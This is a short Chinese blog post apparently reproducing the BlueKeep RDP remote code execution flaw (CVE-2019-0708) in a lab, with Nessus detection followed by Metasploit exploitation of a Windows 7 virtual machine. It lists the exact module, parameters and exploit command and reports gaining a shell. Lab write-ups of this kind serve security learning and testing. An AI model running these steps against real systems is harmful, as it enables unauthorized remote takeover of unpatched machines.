【漏洞复现】远程桌面服务远程执行代码[CVE-2019-0708]
【CVE-2019-0708】远程桌面服务远程执行代码漏洞
当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求时,远程桌面服务中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。
靶机: windows7 IP:192.168.64.178
攻击机:KALI2022 IP:192.168.64.157
漏扫工具:Nessus
1.发现漏洞
使用Nessus对靶机进行漏洞扫描,发现存在【CVE-2019-0708】远程桌面服务远程执行代码漏洞。
2.漏洞利用
使用kali并启动msfconsole
搜索CVE-2019-0708可利用的EXP
# search 0708
使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# use 1
设置参数
set RHOST 192.168.64.178
set target 5 #因为靶机是vmware创建的虚拟机,因此这里选择5,可根据实际情况选择
执行攻击
# exploit
成功获取权限,可执行shell
成功的关键:需要windows7靶机关闭防火墙,并且开启远程桌面。
本文作者:gloves7
本文链接:https://www.cnblogs.com/gloves7/p/17734511.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
标签:
漏洞复现
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库